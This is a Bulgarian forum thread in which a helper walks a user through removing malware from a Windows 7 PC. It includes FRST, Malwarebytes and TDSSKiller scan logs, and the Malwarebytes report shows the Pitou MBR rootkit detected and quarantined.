2019-01-03 15:34 - 2018-08-11 14:17 - 000000000 ____D C:\Users\ВЕС\Downloads\k-meleon
2019-01-01 13:09 - 2018-09-02 13:32 - 000000000 ____D C:\Users\ВЕС\Documents\TalkHelper

==================== Files in the root of some directories =======

1601-01-03 21:26 - 1601-01-03 21:26 - 000186368 ____N (Microsoft Corporation) C:\Users\ВЕС\AppData\Local\aIQEonJ.exe
2019-01-03 19:10 - 2019-01-03 19:10 - 006161408 _____ () C:\Users\ВЕС\AppData\Local\dump007.dat
2019-01-03 19:01 - 2019-01-03 19:01 - 000140800 _____ () C:\Users\ВЕС\AppData\Local\installer.dat
2019-01-03 19:00 - 2019-01-03 19:00 - 000000003 _____ () C:\Users\ВЕС\AppData\Local\wbem.ini

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2019-01-04 03:11

==================== End of FRST.txt ============================

Addition.txt

Сподели този отговор


Линк към този отговор
Сподели в други сайтове

Сега каква е ситуацията до тук...?

Деинсталиране на нежелани / ненужни програми:

  • Натиснете клавишна комбинация   WindowsKey.png + R на клавиатурата си едновременно. Напишете (копирайте) в полето  appwiz.cpl и кликнете върху OK.
  • В отворилия се списък с инсталирани програми щракнете с десния бутон на мишката върху следната програма:
Цитат

RogueKiller version 13.0.20.0

..и след това кликнете върху Uninstall (Деинсталиране)..!

 

 

GfiJrQ9.png&key=c8330b952021a3c1e5ae3771  Сканиране с Malwarebytes Anti-Malware (MBAM)

Моля изтеглете Malwarebytes Anti -Malware и я запазете на вашия десктоп.

  • Стартирайте файла mb3-setup-consumer- x.x.x.xxxx.exe и следвайте указанията за да инсталирате програмата.
  • След като инсталацията приключи програмата ще стартира автоматично.
  • Отидете до табът Settings => Protection > и под категорията Scan Options включете опцията "Scan for rootkits" като преместите плъзгача надясно.

xTvORSF.png

  • Отидете до табът Scan, и изберете Threat Scan и след това натиснете бутона Start Scan.

RUSrqgW.png

  • Ще започне проверка за зловреден софтуер.

4CJ90KI.png

  • При някои инфекции можете да видите съобщението:
  • "Could not load DDA driver"
  • Натиснете "Yes" на това съобщение за да позволите драйвера да се зареди след рестарт.
  • Разрешете на компютъра да се рестартира и след това продължете с останалите инструкции.
  • След като проверката приключи ще се появи списъка с резултатите (ако има намерени обекти). Ако програмата е минимизирана докато сканира ще се появи следното съобщение ако има открити заплахи. Натиснете бутона View Scan Results.

37b.png

  • . Натиснете бутона Quarantine Selected.

2CfXEk1.png

  • Изчакайте да се появи прозореца подканващ ви да рестартирате и след това натиснете бутона Yes.

8Jc9dl9.png

  • След рестарта, стартирайте отново Malwarebytes Anti-Malware.
  • Отидете то табът Reports и отворете лог файла с името Scan Report.

X0ha4sd.png

  • Натиснете бутона Export и след това =>  "Copy to Clipboard"

fE9qzai.png

  • Сега вече поставете съдържанието на лог файла с клавишната комбинация Ctrl + Vи го публикувайте в следващия си коментар.

 

pfNZP4A.png  Дневници
 
В следващия си отговор, моля да включите следните дневници:

  • Дневник от Malwarebytes Anti -Malware

 

Сподели този отговор


Линк към този отговор
Сподели в други сайтове

Сега вече системата работи по-добре

 

Malwarebytes
www.malwarebytes.com

-Детайли за регистъра-
Дата на сканиране: 4.01.19 г.
Час на сканиране: 18:54
Файл на регистъра: d14c9b0c-1049-11e9-8809-002713343a56.json

-Информация за софтуера-
Версия: 3.6.1.2711
Версия на компонентите: 1.0.508
Актуализирай версията на пакета: 1.0.8625
Лиценз: Пробен период

-Системна информация-
OS: Windows 7 Service Pack 1
CPU: x86
Файлова система: NTFS
Потребител: WIN-SKFJ6HLGST2\\u00d0\u0092\u00d0\u0095\u00d0\u00a1

-Резюме на сканирането-
Тип сканиране: Threat Scan
Сканирането е стартирано от: Ръчно
Резултат: Завършено
Сканирани обекти: 148014
Открити заплахи: 2
Заплахи под карантина: 2
Изтекло време: 3 мин, 10 сек

-Опции за сканиране-
Памет: Разрешено
Стартиране: Разрешено
Файлова система: Разрешено
Архиви: Разрешено
руткитове: Разрешено
Евристика: Разрешено
PUP: Открий
PUM: Открий

-Детайли за сканирането-
Процес: 0
(Не бяха открити зловредни елементи)

Модул: 0
(Не бяха открити зловредни елементи)

Ключ на регистъра: 0
(Не бяха открити зловредни елементи)

Стойност на регистъра: 0
(Не бяха открити зловредни елементи)

Данни на регистъра: 0
(Не бяха открити зловредни елементи)

Поток данни: 0
(Не бяха открити зловредни елементи)

Папка: 0
(Не бяха открити зловредни елементи)

Файл: 0
(Не бяха открити зловредни елементи)

Физически сектор: 2
Rootkit.Pitou.c.MBR, 0, Смяна при рестартиране, [15352], [514127],0.0.0
Forged physical sector, 0, Смяна при рестартиране, [0], [0],0.0.0

WMI: 0
(Не бяха открити зловредни елементи)


(end)

Сподели този отговор


Линк към този отговор
Сподели в други сайтове
Цитат

Rootkit.Pitou.c.MBR, 0, Смяна при рестартиране, [15352], [514127],0.0.0
Forged physical sector, 0, Смяна при рестартиране, [0], [0],0.0.0

Рестартирайте компютъра си ...! И след това на базата на тези записи от последното сканиране:

 

Сканиране с TDSSKiller
 
kaspersky.gif  Моля, изтеглете последната версия на TDSSKiller оттук и я запазете на вашиядекстоп (задължително).
 

  • Кликнете на TDSSKiller.exe за да стартирате приложението
  • Натиснете бутона Start Scan.
  •  Не използвайте компютъра по време на сканирането
  •  Ако сканирането завърши с нищо не е намерено, щракнете върху Затвори, за да излезете.
  • Проверката не би трябвало да отмене повече от 2 минути.
  • Ако подозрителен обект бъде засечен, действието по подразбиране ще бъде Skip, кликнете върху Continue.
  • Ако зловредни обекти бъдат намерени, тогава от падащото меню ще имате три възможности.
    Бъдете сигурни, че избраното действие е Cure и натиснете върху Continue >Рестартирайте за да бъде завършена поправката.

    Забележка: Ако Cure бутона не е наличен от възможностите, тогава моля изберете Skip бутона, не избирайте Delete освен ако не сте инструктирани затова.

Лог файл ще бъде създаден в свободната директория на дял C: . Потърсете за лог с името "TDSSKiller.[Version]_[Date]_[Time]_log.txt" и копирайте съдържанието му в следващия си пост.

  • Харесва ми 1

Сподели този отговор


Линк към този отговор
Сподели в други сайтове

19:28:10.0584 0x0ebc  TDSS rootkit removing tool 3.1.0.25 Dec 24 2018 06:31:07
19:28:15.0968 0x0ebc  ============================================================
19:28:15.0968 0x0ebc  Current date / time: 2019/01/04 19:28:15.0968
19:28:15.0968 0x0ebc  SystemInfo:
19:28:15.0968 0x0ebc  
19:28:15.0968 0x0ebc  OS Version: 6.1.7601 ServicePack: 1.0
19:28:15.0968 0x0ebc  Product type: Workstation
19:28:15.0969 0x0ebc  ComputerName: WIN-SKFJ6HLGST2
19:28:15.0969 0x0ebc  UserName: ВЕС
19:28:15.0969 0x0ebc  Windows directory: C:\Windows
19:28:15.0969 0x0ebc  System windows directory: C:\Windows
19:28:15.0969 0x0ebc  Processor architecture: Intel x86
19:28:15.0969 0x0ebc  Number of processors: 2
19:28:15.0969 0x0ebc  Page size: 0x1000
19:28:15.0969 0x0ebc  Boot type: Normal boot
19:28:15.0970 0x0ebc  CodeIntegrityOptions = 0x00000000
19:28:15.0970 0x0ebc  ============================================================
19:28:20.0907 0x0ebc  KLMD registered as C:\Windows\system32\drivers\65300919.sys
19:28:20.0907 0x0ebc  KLMD ARK init status: drvProperties = 0xFFF00, osBuild = 7601.17514, osProperties = 0x0
19:28:21.0166 0x0ebc  System UUID: {A8E52CEA-BEC2-A704-09F4-DDADC690A2B5}
19:28:21.0563 0x0ebc  Drive \Device\Harddisk0\DR0 - Size: 0x7470C06000 ( 465.76 Gb ), SectorSize: 0x200, Cylinders: 0xED81, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000050
19:28:21.0581 0x0ebc  ============================================================
19:28:21.0581 0x0ebc  \Device\Harddisk0\DR0:
19:28:21.0581 0x0ebc  MBR partitions:
19:28:21.0581 0x0ebc  \Device\Harddisk0\DR0\Partition1: MBR, Type 0x7, StartLBA 0x800, BlocksNum 0x32000
19:28:21.0581 0x0ebc  \Device\Harddisk0\DR0\Partition2: MBR, Type 0x7, StartLBA 0x32800, BlocksNum 0xC834000
19:28:21.0581 0x0ebc  \Device\Harddisk0\DR0\Partition3: MBR, Type 0x7, StartLBA 0xC866800, BlocksNum 0x2DA3E000
19:28:21.0582 0x0ebc  ============================================================
19:28:21.0613 0x0ebc  C: <-> \Device\Harddisk0\DR0\Partition2
19:28:21.0641 0x0ebc  D: <-> \Device\Harddisk0\DR0\Partition3
19:28:21.0675 0x0ebc  H: <-> \Device\Harddisk0\DR0\Partition1
19:28:21.0675 0x0ebc  ============================================================
19:28:21.0675 0x0ebc  Initialize success
19:28:21.0675 0x0ebc  ============================================================
19:28:24.0645 0x0744  ============================================================
19:28:24.0645 0x0744  Scan started
19:28:24.0645 0x0744  Mode: Manual; 
19:28:24.0645 0x0744  ============================================================
19:28:24.0646 0x0744  KSN ping started
19:28:27.0396 0x0744  KSN ping finished: true
19:28:28.0829 0x0744  ================ Scan BIOS =================================
19:28:28.0831 0x0744  BIOS info: vendor = Hewlett-Packard, version = 68PCU Ver. F.20, releaseDate = 12/08/2011
19:28:28.0831 0x0744  Base board info: manufacturer = Hewlett-Packard, product = 30DB, version = KBC Version 87.2B
19:28:36.0192 0x0744  [ 86000431CDB982F490384FFA47386F63, B831A27F0DE9D10A6BA8CB5E7E219459525A39BC1E098BC3F4A1E11672591EC8 ] BIOS
19:28:39.0192 0x0744  BIOS - ok
19:28:39.0199 0x0744  ================ Scan system memory ========================
19:28:39.0202 0x0744  System memory - ok
19:28:39.0204 0x0744  ================ Scan services =============================
19:28:39.0800 0x0744  [ 1B133875B8AA8AC48969BD3458AFE9F5, 01753BDD47F3F9BC0E0D23A069B9C56D4AE6A6B6295BC19B95AE245D25B12744 ] 1394ohci        C:\Windows\system32\DRIVERS\1394ohci.sys
19:28:39.0811 0x0744  1394ohci - ok
19:28:39.0843 0x0744  [ CEA80C80BED809AA0DA6FEBC04733349, AE69C142DC2210A4AE657C23CEA4A6E7CB32C4F4EBA039414123CAC52157509B ] ACPI            C:\Windows\system32\drivers\ACPI.sys
19:28:39.0853 0x0744  ACPI - ok
19:28:39.0872 0x0744  [ 1EFBC664ABFF416D1D07DB115DCB264F, BF94D069D692140B792DBF4FD3CB0127D27C26CC5BFB6B0C28A8B6346767EE58 ] AcpiPmi         C:\Windows\system32\drivers\acpipmi.sys
19:28:39.0874 0x0744  AcpiPmi - ok
19:28:39.0904 0x0744  [ 21E785EBD7DC90A06391141AAC7892FB, A2D3D764C5E6DC0AD5AAF48485FFB8B121D2A40DC08ECF2D2CB92278A1002B25 ] adp94xx         C:\Windows\system32\drivers\adp94xx.sys
19:28:39.0919 0x0744  adp94xx - ok
19:28:39.0933 0x0744  [ 0C676BC278D5B59FF5ABD57BBE9123F2, 339E8A433D186BAAB6FCB44C82CC9FB6FCD63C87981449494CBEB2072CB6B7BB ] adpahci         C:\Windows\system32\drivers\adpahci.sys
19:28:39.0940 0x0744  adpahci - ok
19:28:39.0949 0x0744  [ 7C7B5EE4B7B822EC85321FE23A27DB33, A934AFB71D439555E6376DA9B34F82E8D39A300A4547BE9AC9311F6A3C36270C ] adpu320         C:\Windows\system32\drivers\adpu320.sys
19:28:39.0954 0x0744  adpu320 - ok
19:28:39.0988 0x0744  [ 8B5EEFEEC1E6D1A72A06C526628AD161, 026CDF4C96F4D493E7BABF79A14C4B0B5ADCCEF0B081FFFA2E3B243B2414167F ] AeLookupSvc     C:\Windows\System32\aelupsvc.dll
19:28:39.0990 0x0744  AeLookupSvc - ok
19:28:40.0048 0x0744  [ 1151FD4FB0216CFED887BFDE29EBD516, 673C2B498744C7EB846F6BD4FDC852B0A9722377D75FD694F7F78E727ADF4563 ] AFD             C:\Windows\system32\drivers\afd.sys
19:28:40.0060 0x0744  AFD - ok
19:28:40.0145 0x0744  [ 7E10E3BB9B258AD8A9300F91214D67B9, CE5FAD7BF78234B64EAADF64DB23F3C342AADB9C5E3B0168E57863F494F30318 ] AgereSoftModem  C:\Windows\system32\DRIVERS\AGRSM.sys
19:28:40.0173 0x0744  AgereSoftModem - ok
19:28:40.0195 0x0744  [ 507812C3054C21CEF746B6EE3D04DD6E, D7E59350AC338AD229E3D10C76E32AE16D120311B263714A9CD94AB538633B0E ] agp440          C:\Windows\system32\drivers\agp440.sys
19:28:40.0197 0x0744  agp440 - ok
19:28:40.0216 0x0744  [ 8B30250D573A8F6B4BD23195160D8707, 64EC289AFCD63D84EAFD9D81C50D0A77BCC79A1EFF32C50B2776BB0C0151757D ] aic78xx         C:\Windows\system32\drivers\djsvs.sys
19:28:40.0219 0x0744  aic78xx - ok
19:28:40.0250 0x0744  [ 18A54E132947CD98FEA9ACCC57F98F13, 9D39AF972785E49F0DD12C4BAEF39A79CD69F098886BF152AF1B7CCE2E902115 ] ALG             C:\Windows\System32\alg.exe
19:28:40.0252 0x0744  ALG - ok
19:28:40.0287 0x0744  [ 0D40BCF52EA90FC7DF2AEAB6503DEA44, 1D1AA8F50935D976C29DE7A84708CADBBBDD936F0DD2C059E820F0D21367B3B6 ] aliide          C:\Windows\system32\drivers\aliide.sys
19:28:40.0289 0x0744  aliide - ok
19:28:40.0295 0x0744  [ 3C6600A0696E90A463771C7422E23AB5, 370B33DC1C25B981628A318BAE434A78A5F0A0DA93C2896DC7A3D7B87AE1A5E7 ] amdagp          C:\Windows\system32\drivers\amdagp.sys
19:28:40.0297 0x0744  amdagp - ok
19:28:40.0304 0x0744  [ CD5914170297126B6266860198D1D4F0, 2239FCBD1A7EC27CE4F10DA36AE6BD6CCB87E5128C82CA71B84BFE5AF5602A60 ] amdide          C:\Windows\system32\drivers\amdide.sys
19:28:40.0305 0x0744  amdide - ok
19:28:40.0323 0x0744  [ 00DDA200D71BAC534BF56A9DB5DFD666, CA316B1FFD85BA1CF8664B3229DA1F238A5341E016059F7ED89702324CFD124B ] AmdK8           C:\Windows\system32\drivers\amdk8.sys
19:28:40.0326 0x0744  AmdK8 - ok
19:28:40.0333 0x0744  [ 3CBF30F5370FDA40DD3E87DF38EA53B6, 7EACF1743367BE805357B6FD10F8F99E9B1C301FE3782D77719347B13DFA65EC ] AmdPPM          C:\Windows\system32\drivers\amdppm.sys
19:28:40.0336 0x0744  AmdPPM - ok
19:28:40.0356 0x0744  [ E7F4D42D8076EC60E21715CD11743A0D, 91AC020A70964F8783C999BDE8AB8391A3FA3AFC1CD4BC52A43625A2010A53E7 ] amdsata         C:\Windows\system32\drivers\amdsata.sys
19:28:40.0359 0x0744  amdsata - ok
19:28:40.0367 0x0744  [ EA43AF0C423FF267355F74E7A53BDABA, 3F1335909AB0281A2FBDD7AD90E18309E091656CD32B48894B992789D8C61DB4 ] amdsbs          C:\Windows\system32\drivers\amdsbs.sys
19:28:40.0374 0x0744  amdsbs - ok
19:28:40.0380 0x0744  [ 146459D2B08BFDCBFA856D9947043C81, AC7F2069717601F949B0968EA651899D497170A93B84281B66D3CE5C382DDECB ] amdxata         C:\Windows\system32\drivers\amdxata.sys
19:28:40.0381 0x0744  amdxata - ok
19:28:40.0390 0x0744  [ AEA177F783E20150ACE5383EE368DA19, 8FA9EE27AA1F22E8B8FE33A21028CA1E0062BAA95CB132C20D55B98C03B4254F ] AppID           C:\Windows\system32\drivers\appid.sys
19:28:40.0393 0x0744  AppID - ok
19:28:40.0436 0x0744  [ 62A9C86CB6085E20DB4823E4E97826F5, E0F840B49710022C4FB437002AD06F64B0F6B5D628B32D00F2B66765E6B97E4B ] AppIDSvc        C:\Windows\System32\appidsvc.dll
19:28:40.0439 0x0744  AppIDSvc - ok
19:28:40.0457 0x0744  [ FB1959012294D6AD43E5304DF65E3C26, CFE906B07FF71A178CF9C254B056C6F5A303DDC511F0E4E1E75808F1D5326495 ] Appinfo         C:\Windows\System32\appinfo.dll
19:28:40.0459 0x0744  Appinfo - ok
19:28:40.0492 0x0744  [ A45D184DF6A8803DA13A0B329517A64A, C1D16B60A6D69689AE951DC3D6884ED2E233D144B3FC0B86BC1C50AAAAA01ED2 ] AppMgmt         C:\Windows\System32\appmgmts.dll
19:28:40.0497 0x0744  AppMgmt - ok
19:28:40.0503 0x0744  [ 2932004F49677BD84DBC72EDB754FFB3, 73F84582244AC53994A2F4499A119B4A84A6BF7FD3046C29A8080C763DE540B8 ] arc             C:\Windows\system32\drivers\arc.sys
19:28:40.0505 0x0744  arc - ok
19:28:40.0529 0x0744  [ 5D6F36C46FD283AE1B57BD2E9FEB0BC7, F7C9C3B4F2C816F57A43B2921672858C291054220BADE291044343778216F6BA ] arcsas          C:\Windows\system32\drivers\arcsas.sys
19:28:40.0532 0x0744  arcsas - ok
19:28:40.0553 0x0744  [ ADD2ADE1C2B285AB8378D2DAAF991481, 7965A705F37924C0EC7A934E64E89C5DF4069816E2EEA3509E0AC90F78910519 ] AsyncMac        C:\Windows\system32\DRIVERS\asyncmac.sys
19:28:40.0555 0x0744  AsyncMac - ok
19:28:40.0578 0x0744  [ 338C86357871C167A96AB976519BF59E, F28CC534523D1701B0552F5D7E18E88369C4218BDB1F69110C3E31D395884AD6 ] atapi           C:\Windows\system32\drivers\atapi.sys
19:28:40.0579 0x0744  atapi - ok
19:28:40.0640 0x0744  [ CE3B4E731638D2EF62FCB419BE0D39F0, 3B98179CB0101778D9E7810D2CD46D9C0D7120E141BA11471666E7D9EB3C93CC ] AudioEndpointBuilder C:\Windows\System32\Audiosrv.dll
19:28:40.0653 0x0744  AudioEndpointBuilder - ok
19:28:40.0670 0x0744  [ CE3B4E731638D2EF62FCB419BE0D39F0, 3B98179CB0101778D9E7810D2CD46D9C0D7120E141BA11471666E7D9EB3C93CC ] Audiosrv        C:\Windows\System32\Audiosrv.dll
19:28:40.0678 0x0744  Audiosrv - ok
19:28:40.0708 0x0744  [ 6E30D02AAC9CAC84F421622E3A2F6178, 229DC527C1D6C778BCA2C855A2A6F6D2C4B0F4F6DE56C886B3AAD26E3347952C ] AxInstSV        C:\Windows\System32\AxInstSV.dll
19:28:40.0712 0x0744  AxInstSV - ok
19:28:40.0782 0x0744  [ 1A231ABEC60FD316EC54C66715543CEC, 09E2897BA80737997A286EA5408C03DD3CC0EBACD24CB391C2455B6D4BE7D67E ] b06bdrv         C:\Windows\system32\drivers\bxvbdx.sys
19:28:40.0797 0x0744  b06bdrv - ok
19:28:40.0835 0x0744  [ BD8869EB9CDE6BBE4508D869929869EE, F4363A12EBFDBB89C69FD59B22F9EE05BADA07D477A1DF2DE01F59D6EE496543 ] b57nd60x        C:\Windows\system32\DRIVERS\b57nd60x.sys
19:28:40.0845 0x0744  b57nd60x - ok
19:28:40.0906 0x0744  [ EE1E9C3BB8228AE423DD38DB69128E71, ED54FD9795F3A4D32F02BED6052AD9404409A05644CDBEBFF19C662D104DA95A ] BDESVC          C:\Windows\System32\bdesvc.dll
19:28:40.0909 0x0744  BDESVC - ok
19:28:40.0924 0x0744  [ 505506526A9D467307B3C393DEDAF858, 8AD6F1492E357F57CF42261497BA29122045D4FC0DCC9669AA5AC9B2A4BABFA4 ] Beep            C:\Windows\system32\drivers\Beep.sys
19:28:40.0928 0x0744  Beep - ok
19:28:40.0963 0x0744  [ 1E2BAC209D184BB851E1A187D8A29136, 53933C938DA5126986FFF2918C1F522ABE93ABAB460AE32E4453161C2F7B68DF ] BFE             C:\Windows\System32\bfe.dll
19:28:40.0976 0x0744  BFE - ok
19:28:41.0015 0x0744  [ E585445D5021971FAE10393F0F1C3961, 178C008A9A0A6BFDA65EB0B98C510271360AD4474F22F13594F5EB60AA4E1CF5 ] BITS            C:\Windows\System32\qmgr.dll
19:28:41.0031 0x0744  BITS - ok
19:28:41.0037 0x0744  [ 2287078ED48FCFC477B05B20CF38F36F, 55BCA6174E6034A8D61CBE4126B2F1989F6052BFA624BEA9C0A0A664AEC74521 ] blbdrive        C:\Windows\system32\DRIVERS\blbdrive.sys
19:28:41.0039 0x0744  blbdrive - ok
19:28:41.0044 0x0744  [ FCAFAEF6798D7B51FF029F99A9898961, BFB37686B1386EB883B99DB6AC342C20514939F8B7A5CEC5D63865B3DC2B4D4F ] bowser          C:\Windows\system32\DRIVERS\bowser.sys
19:28:41.0047 0x0744  bowser - ok
19:28:41.0060 0x0744  [ 9F9ACC7F7CCDE8A15C282D3F88B43309, A9131334BD9CF8FD60BA9D54AA054E2DF2BE1219FB650DF1464F2787BDEAE98F ] BrFiltLo        C:\Windows\system32\drivers\BrFiltLo.sys
19:28:41.0062 0x0744  BrFiltLo - ok
19:28:41.0067 0x0744  [ 56801AD62213A41F6497F96DEE83755A, 0DEB8318FB47DF6473C171C795C735E26A73FA12232876C6856549EA16F33361 ] BrFiltUp        C:\Windows\system32\drivers\BrFiltUp.sys
19:28:41.0068 0x0744  BrFiltUp - ok
19:28:41.0085 0x0744  [ 6E11F33D14D020F58D5E02E4D67DFA19, 9563E4E8CE769B7619745F6F6DE618389A1595785023BF1F295AD8301B27F0AF ] Browser         C:\Windows\System32\browser.dll
19:28:41.0089 0x0744  Browser - ok
19:28:41.0100 0x0744  [ 845B8CE732E67F3B4133164868C666EA, 9309B094CD9B5EBC46295A5EB806BED472C3CEDE3B5F6F497EBDABA496A2A27F ] Brserid         C:\Windows\System32\Drivers\Brserid.sys
19:28:41.0108 0x0744  Brserid - ok
19:28:41.0131 0x0744  [ 203F0B1E73ADADBBB7B7B1FABD901F6B, 782FA7B26940FE479C49C9BAA2EB582CDAAAD607013E9BCFC85E6FBBB7D49A6D ] BrSerWdm        C:\Windows\System32\Drivers\BrSerWdm.sys
19:28:41.0134 0x0744  BrSerWdm - ok
19:28:41.0139 0x0744  [ BD456606156BA17E60A04E18016AE54B, DFBDC9DA6A3EA40BACFF204BC6C55C2C122B5885D2CBF6D45054DE43EE15EC4D ] BrUsbMdm        C:\Windows\System32\Drivers\BrUsbMdm.sys
19:28:41.0140 0x0744  BrUsbMdm - ok
19:28:41.0146 0x0744  [ AF72ED54503F717A43268B3CC5FAEC2E, 4A638669B0C30B1BDED242A8BF2015A37749570FF4D67D190BACC8D7E0C44468 ] BrUsbSer        C:\Windows\System32\Drivers\BrUsbSer.sys
19:28:41.0147 0x0744  BrUsbSer - ok
19:28:41.0194 0x0744  [ 2865A5C8E98C70C605F417908CEBB3A4, B1C5AC228BD7072AF8668C009C6CDC13EE9FCB9481F57524300F37C40BF1E935 ] BthEnum         C:\Windows\system32\DRIVERS\BthEnum.sys
19:28:41.0196 0x0744  BthEnum - ok
19:28:41.0202 0x0744  [ ED3DF7C56CE0084EB2034432FC56565A, B5B75E002E7BC0209582C635CCCA26DB569BDB23C33A126634E00C6434BF941B ] BTHMODEM        C:\Windows\system32\drivers\bthmodem.sys
19:28:41.0204 0x0744  BTHMODEM - ok
19:28:41.0228 0x0744  [ AD1872E5829E8A2C3B5B4B641C3EAB0E, 8C2DBCAC08DDB41E2B44E257C55FA2D0272959B308EFF9EAF5FF9AE1E4A0AA39 ] BthPan          C:\Windows\system32\DRIVERS\bthpan.sys
19:28:41.0231 0x0744  BthPan - ok
19:28:41.0261 0x0744  [ 195C41CC67E9E1CEDD960CCB74925920, 28F6032E75D24A01A0E9932618CC50D14716DDF2954EB1112F10AEC904FB4E39 ] BTHPORT         C:\Windows\system32\Drivers\BTHport.sys
19:28:41.0271 0x0744  BTHPORT - ok
19:28:41.0316 0x0744  [ 1DF19C96EEF6C29D1C3E1A8678E07190, 1F4BB161FF3A1C5B1465BB52F3520FEDB7ACB1FAA132466F07D16DB8E394AEA5 ] bthserv         C:\Windows\system32\bthserv.dll
19:28:41.0319 0x0744  bthserv - ok
19:28:41.0344 0x0744  [ 43B3206DD654E783AA7E4EAD340A43B8, 34D3B4F7FA872F1071F0CB8B4DCC00F1779AEBA74583D21FA7502A165D9209F5 ] BTHUSB          C:\Windows\system32\Drivers\BTHUSB.sys
19:28:41.0346 0x0744  BTHUSB - ok
19:28:41.0386 0x0744  [ 77EA11B065E0A8AB902D78145CA51E10, 160EB3BBE9E5F3CC4A02584E6F2576A812C7565B940D74838B983F1EE51FA73A ] cdfs            C:\Windows\system32\DRIVERS\cdfs.sys
19:28:41.0388 0x0744  cdfs - ok
19:28:41.0418 0x0744  [ BE167ED0FDB9C1FA1133953C18D5A6C9, E26A851CA13E7300F977E5B20FA5D25FD0E1442AB6AD5DB58BBDB2DAAD87027C ] cdrom           C:\Windows\system32\DRIVERS\cdrom.sys
19:28:41.0421 0x0744  cdrom - ok
19:28:41.0473 0x0744  [ 319C6B309773D063541D01DF8AC6F55F, 182F392FE839499D159A30A3CD04B5D0C87219930BFB1A7456880B7DA75B9820 ] CertPropSvc     C:\Windows\System32\certprop.dll
19:28:41.0476 0x0744  CertPropSvc - ok
19:28:41.0481 0x0744  [ 3FE3FE94A34DF6FB06E6418D0F6A0060, 6B3A2A26609A75B690D4C0B3059E40822F3B3DB08943F58EC496BABDA7D0A735 ] circlass        C:\Windows\system32\drivers\circlass.sys
19:28:41.0483 0x0744  circlass - ok
19:28:41.0506 0x0744  [ 635181E0E9BBF16871BF5380D71DB02D, 58D5150C6F3B9F1730FFDF3A8A2ABF5FF207F9785BD66C0C1E03A0F1C223A26A ] CLFS            C:\Windows\system32\CLFS.sys
19:28:41.0513 0x0744  CLFS - ok
19:28:41.0669 0x0744  [ D88040F816FDA31C3B466F0FA0918F29, 39D3630E623DA25B8444B6D3AAAB16B98E7E289C5619E19A85D47B74C71449F3 ] clr_optimization_v2.0.50727_32 C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
19:28:41.0679 0x0744  clr_optimization_v2.0.50727_32 - ok
19:28:41.0745 0x0744  [ DEA805815E587DAD1DD2C502220B5616, 2D6A7668C95352B818F5EC59FF462894935833D34190257DA9CAC7E67FD3631C ] CmBatt          C:\Windows\system32\DRIVERS\CmBatt.sys
19:28:41.0747 0x0744  CmBatt - ok
19:28:41.0757 0x0744  [ C537B1DB64D495B9B4717B4D6D9EDBF2, 400EEFE662DE117C9CC956E4CBD5E98F28F962E7447CD93E8A78FDD8CA39EB4B ] cmdide          C:\Windows\system32\drivers\cmdide.sys
19:28:41.0761 0x0744  cmdide - ok
19:28:41.0786 0x0744  [ 1B675691ED940766149C93E8F4488D68, A55C41B2B343B1CF53D737ED1752D0510052094FFC60FDB833279A8A52398132 ] CNG             C:\Windows\system32\Drivers\cng.sys
19:28:41.0795 0x0744  CNG - ok
19:28:41.0814 0x0744  [ A6023D3823C37043986713F118A89BEE, FAC239A7FA6251C7EDFFA34B4BAE3910B8BC0BD4A3574B6DB6931A8D691E207B ] Compbatt        C:\Windows\system32\DRIVERS\compbatt.sys
19:28:41.0815 0x0744  Compbatt - ok
19:28:41.0823 0x0744  [ CBE8C58A8579CFE5FCCF809E6F114E89, AC083A1C649EBA18C59FCC1772D0784B10E2B8C63094E3C14388E147DBC3F6DF ] CompositeBus    C:\Windows\system32\DRIVERS\CompositeBus.sys
19:28:41.0825 0x0744  CompositeBus - ok
19:28:41.0836 0x0744  COMSysApp - ok
19:28:41.0842 0x0744  [ 2C4EBCFC84A9B44F209DFF6C6E6C61D1, 6FC323217D82EF661BA0E3F949B61B05BB5235D1A69C81D24876C2153FAECEF6 ] crcdisk         C:\Windows\system32\drivers\crcdisk.sys
19:28:41.0844 0x0744  crcdisk - ok
19:28:41.0899 0x0744  [ A585BEBF7D054BD9618EDA0922D5484A, 340DF730E88F8B6A4EF542F620EBA2A720546AFAB4DFFA00F066B7610A1026C5 ] CryptSvc        C:\Windows\system32\cryptsvc.dll
19:28:41.0908 0x0744  CryptSvc - ok
19:28:41.0985 0x0744  [ 3C2177A897B4CA2788C6FB0C3FD81D4B, 98575CBD0664586E6211D02E71BDD52CBAA149A1658573550E29E74E5F7B1553 ] CSC             C:\Windows\system32\drivers\csc.sys
19:28:42.0000 0x0744  CSC - ok
19:28:42.0045 0x0744  [ 15F93B37F6801943360D9EB42485D5D3, DD6838C6496CB15F8BB57A6596F6A64ADD9C36B09F062295699131232712B558 ] CscService      C:\Windows\System32\cscsvc.dll
19:28:42.0065 0x0744  CscService - ok
19:28:42.0130 0x0744  [ 7660F01D3B38ACA1747E397D21D790AF, 04611B43705C064C2A8331F6D3F8E4530295694AE2C3E3EC3F62CFF4A5EFA88D ] DcomLaunch      C:\Windows\system32\rpcss.dll
19:28:42.0146 0x0744  DcomLaunch - ok
19:28:42.0186 0x0744  [ 8D6E10A2D9A5EED59562D9B82CF804E1, 888F9650F4E872BA8F4E0C27E38A6672A561042B17EBA40E306A22357965B0AD ] defragsvc       C:\Windows\System32\defragsvc.dll
19:28:42.0192 0x0744  defragsvc - ok
19:28:42.0222 0x0744  [ F024449C97EC1E464AAFFDA18593DB88, 7EF1E241892E098A472BCA14C724DFF1AACCF190954AF1C4A38B6D542CC74BD2 ] DfsC            C:\Windows\system32\Drivers\dfsc.sys
19:28:42.0225 0x0744  DfsC - ok
19:28:42.0270 0x0744  [ E9E01EB683C132F7FA27CD607B8A2B63, 4D9037B458C522874619143A4176BCED42472C68933E6E83D37B67242706F3C4 ] Dhcp            C:\Windows\system32\dhcpcore.dll
19:28:42.0278 0x0744  Dhcp - ok
